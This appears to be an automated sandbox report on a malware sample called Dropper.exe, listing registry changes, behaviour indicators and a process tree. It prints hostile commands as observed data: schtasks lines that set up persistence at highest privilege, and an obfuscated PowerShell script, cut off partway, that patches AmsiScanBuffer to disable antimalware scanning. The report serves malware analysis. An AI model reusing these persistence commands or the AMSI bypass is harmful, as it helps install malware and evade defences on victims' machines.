\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).x = "4294967295" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "63" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "2" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1128" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac04000000c8000000354b179bff40d211a27e00c04fc308710300000080000000354b179bff40d211a27e00c04fc308710200000080000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).left = "328" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Dropper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3908 schtasks.exe 2936 schtasks.exe 5464 schtasks.exe 5732 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
Explorer.EXEpid process 3428 Explorer.EXE 3428 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
$77-aachost.exe$77-penisballs.exepowershell.EXEpid process 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 4344 powershell.EXE 4344 powershell.EXE 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
$77-penisballs.exeExplorer.EXEpid process 3408 $77-penisballs.exe 3428 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
$77-sdchost.exe$77-penisballs.exe$77-aachost.exepowershell.EXEdllhost.exe$77-aachost.exe$77-sdchost.exedwm.exesvchost.exesvchost.exe$77-penisballs.exesvchost.exedescription pid process Token: SeDebugPrivilege 3924 $77-sdchost.exe Token: SeDebugPrivilege 3408 $77-penisballs.exe Token: SeDebugPrivilege 1428 $77-aachost.exe Token: SeDebugPrivilege 3924 $77-sdchost.exe Token: SeDebugPrivilege 4344 powershell.EXE Token: SeDebugPrivilege 4344 powershell.EXE Token: SeDebugPrivilege 5048 dllhost.exe Token: SeDebugPrivilege 2884 $77-aachost.exe Token: SeDebugPrivilege 2348 $77-sdchost.exe Token: SeShutdownPrivilege 1016 dwm.exe Token: SeCreatePagefilePrivilege 1016 dwm.exe Token: SeAuditPrivilege 2628 svchost.exe Token: SeAuditPrivilege 2628 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2704 svchost.exe Token: SeIncreaseQuotaPrivilege 2704 svchost.exe Token: SeSecurityPrivilege 2704 svchost.exe Token: SeTakeOwnershipPrivilege 2704 svchost.exe Token: SeLoadDriverPrivilege 2704 svchost.exe Token: SeSystemtimePrivilege 2704 svchost.exe Token: SeBackupPrivilege 2704 svchost.exe Token: SeRestorePrivilege 2704 svchost.exe Token: SeShutdownPrivilege 2704 svchost.exe Token: SeSystemEnvironmentPrivilege 2704 svchost.exe Token: SeUndockPrivilege 2704 svchost.exe Token: SeManageVolumePrivilege 2704 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2704 svchost.exe Token: SeIncreaseQuotaPrivilege 2704 svchost.exe Token: SeSecurityPrivilege 2704 svchost.exe Token: SeTakeOwnershipPrivilege 2704 svchost.exe Token: SeLoadDriverPrivilege 2704 svchost.exe Token: SeSystemtimePrivilege 2704 svchost.exe Token: SeBackupPrivilege 2704 svchost.exe Token: SeRestorePrivilege 2704 svchost.exe Token: SeShutdownPrivilege 2704 svchost.exe Token: SeSystemEnvironmentPrivilege 2704 svchost.exe Token: SeUndockPrivilege 2704 svchost.exe Token: SeManageVolumePrivilege 2704 svchost.exe Token: SeDebugPrivilege 3484 $77-penisballs.exe Token: SeAuditPrivilege 2240 svchost.exe Token: SeAuditPrivilege 2628 svchost.exe Token: SeAuditPrivilege 2628 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2704 svchost.exe Token: SeIncreaseQuotaPrivilege 2704 svchost.exe Token: SeSecurityPrivilege 2704 svchost.exe Token: SeTakeOwnershipPrivilege 2704 svchost.exe Token: SeLoadDriverPrivilege 2704 svchost.exe Token: SeSystemtimePrivilege 2704 svchost.exe Token: SeBackupPrivilege 2704 svchost.exe Token: SeRestorePrivilege 2704 svchost.exe Token: SeShutdownPrivilege 2704 svchost.exe Token: SeSystemEnvironmentPrivilege 2704 svchost.exe Token: SeUndockPrivilege 2704 svchost.exe Token: SeManageVolumePrivilege 2704 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2704 svchost.exe Token: SeIncreaseQuotaPrivilege 2704 svchost.exe Token: SeSecurityPrivilege 2704 svchost.exe Token: SeTakeOwnershipPrivilege 2704 svchost.exe Token: SeLoadDriverPrivilege 2704 svchost.exe Token: SeSystemtimePrivilege 2704 svchost.exe Token: SeBackupPrivilege 2704 svchost.exe Token: SeRestorePrivilege 2704 svchost.exe Token: SeShutdownPrivilege 2704 svchost.exe Token: SeSystemEnvironmentPrivilege 2704 svchost.exe Token: SeUndockPrivilege 2704 svchost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Explorer.EXEpid process 3428 Explorer.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
$77-penisballs.exe$77-penisballs.exeExplorer.EXEpid process 3408 $77-penisballs.exe 3484 $77-penisballs.exe 3428 Explorer.EXE 3428 Explorer.EXE 3428 Explorer.EXE 3428 Explorer.EXE 3428 Explorer.EXE 3428 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3428 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Dropper.execmd.exe$77-sdchost.exe$77-aachost.execmd.execmd.exepowershell.EXEdllhost.exe$77-aachost.exelsass.execmd.exedescription pid process target process PID 1072 wrote to memory of 4896 1072 Dropper.exe cmd.exe PID 1072 wrote to memory of 4896 1072 Dropper.exe cmd.exe PID 1072 wrote to memory of 4896 1072 Dropper.exe cmd.exe PID 4896 wrote to memory of 4720 4896 cmd.exe curl.exe PID 4896 wrote to memory of 4720 4896 cmd.exe curl.exe PID 4896 wrote to memory of 4720 4896 cmd.exe curl.exe PID 1072 wrote to memory of 3924 1072 Dropper.exe $77-sdchost.exe PID 1072 wrote to memory of 3924 1072 Dropper.exe $77-sdchost.exe PID 1072 wrote to memory of 1428 1072 Dropper.exe $77-aachost.exe PID 1072 wrote to memory of 1428 1072 Dropper.exe $77-aachost.exe PID 1072 wrote to memory of 3408 1072 Dropper.exe $77-penisballs.exe PID 1072 wrote to memory of 3408 1072 Dropper.exe $77-penisballs.exe PID 1072 wrote to memory of 4936 1072 Dropper.exe $77-install.exe PID 1072 wrote to memory of 4936 1072 Dropper.exe $77-install.exe PID 1072 wrote to memory of 4936 1072 Dropper.exe $77-install.exe PID 3924 wrote to memory of 3908 3924 $77-sdchost.exe schtasks.exe PID 3924 wrote to memory of 3908 3924 $77-sdchost.exe schtasks.exe PID 1428 wrote to memory of 1388 1428 $77-aachost.exe cmd.exe PID 1428 wrote to memory of 1388 1428 $77-aachost.exe cmd.exe PID 1428 wrote to memory of 2188 1428 $77-aachost.exe cmd.exe PID 1428 wrote to memory of 2188 1428 $77-aachost.exe cmd.exe PID 1388 wrote to memory of 2936 1388 cmd.exe schtasks.exe PID 1388 wrote to memory of 2936 1388 cmd.exe schtasks.exe PID 2188 wrote to memory of 4640 2188 cmd.exe timeout.exe PID 2188 wrote to memory of 4640 2188 cmd.exe timeout.exe PID 2188 wrote to memory of 2884 2188 cmd.exe $77-aachost.exe PID 2188 wrote to memory of 2884 2188 cmd.exe $77-aachost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 5048 wrote to memory of 612 5048 dllhost.exe winlogon.exe PID 5048 wrote to memory of 668 5048 dllhost.exe lsass.exe PID 5048 wrote to memory of 940 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1016 5048 dllhost.exe dwm.exe PID 5048 wrote to memory of 396 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1044 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1116 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1124 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1140 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1148 5048 dllhost.exe svchost.exe PID 2884 wrote to memory of 3636 2884 $77-aachost.exe cmd.exe PID 2884 wrote to memory of 3636 2884 $77-aachost.exe cmd.exe PID 668 wrote to memory of 2668 668 lsass.exe sysmon.exe PID 5048 wrote to memory of 1224 5048 dllhost.exe svchost.exe PID 668 wrote to memory of 2668 668 lsass.exe sysmon.exe PID 5048 wrote to memory of 1308 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1332 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1372 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1416 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1576 5048 dllhost.exe svchost.exe PID 3636 wrote to memory of 2652 3636 cmd.exe curl.exe PID 3636 wrote to memory of 2652 3636 cmd.exe curl.exe PID 668 wrote to memory of 2668 668 lsass.exe sysmon.exe PID 5048 wrote to memory of 1596 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1652 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1696 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1724 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1772 5048 dllhost.exe svchost.exe PID 668 wrote to memory of 2668 668 lsass.exe sysmon.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{903f9ed0-271d-4fa2-9c9f-890a96010122}2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmp7F0E.tmp.bat""4⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KheAFTgcWVjf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wQHPWKZNqUmUHS,[Parameter(Position=1)][Type]$FfDLwCFLwj)$CNoGlYvJxaa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+[Char](108)+'ec'+'t'+''+[Char](101)+'d'+[Char](68)+''+'e'+'le'+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Memor'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+','+'P'+'u'+[Char](98)+'li'+'c'+','+[Char](83)+''+[Char](101)+'a'+[Char](108)+'ed,'+[Char](65)+''+[Char](110)+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+'o'+'C'+'l'+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$CNoGlYvJxaa.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'P'+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wQHPWKZNqUmUHS).SetImplementationFlags('R'+[Char](117)+'n'+'t'+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'ag'+'e'+''+[Char](100)+'');$CNoGlYvJxaa.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+''+'k'+'e','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+','+'N'+[Char](101)+'wS'+'l'+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$FfDLwCFLwj,$wQHPWKZNqUmUHS).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+'ged');Write-Output $CNoGlYvJxaa.CreateType();}$zlSZHQSZDdIbd=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+'o'+''+[Char](115)+'of'+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+'2'+''+[Char](46)+'U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+'t'+'i'+'v'+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$LPNWelmbpYSLwo=$zlSZHQSZDdIbd.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+'o'+'c'+''+[Char](65)+'d'+[Char](100)+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ccnNdwrbLmwftmoBeKi=KheAFTgcWVjf @([String])([IntPtr]);$bVQwzdyqubsKquGnQrBRlb=KheAFTgcWVjf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cyjiJAhoJrQ=$zlSZHQSZDdIbd.GetMethod('G'+[Char](101)+''+'t'+''+'M'+''+'o'+''+'d'+''+[Char](117)+'l'+[Char](101)+''+'H'+''+'a'+''+[Char](110)+'dl'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+'e'+''+[Char](108)+'32'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$eepqzGCebUEmqC=$LPNWelmbpYSLwo.Invoke($Null,@([Object]$cyjiJAhoJrQ,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$dFswwMZgFBecwnDhF=$LPNWelmbpYSLwo.Invoke($Null,@([Object]$cyjiJAhoJrQ,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+'r'+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$JDKnOsM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eepqzGCebUEmqC,$ccnNdwrbLmwftmoBeKi).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$YlYSDLczSfqNbAFze=$LPNWelmbpYSLwo.Invoke($Null,@([Object]$JDKnOsM,[Object]('A'+'m'+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+'B'+'u'+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$UISooMkNsu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dFswwMZgFBecwnDhF,$bVQwzdyqu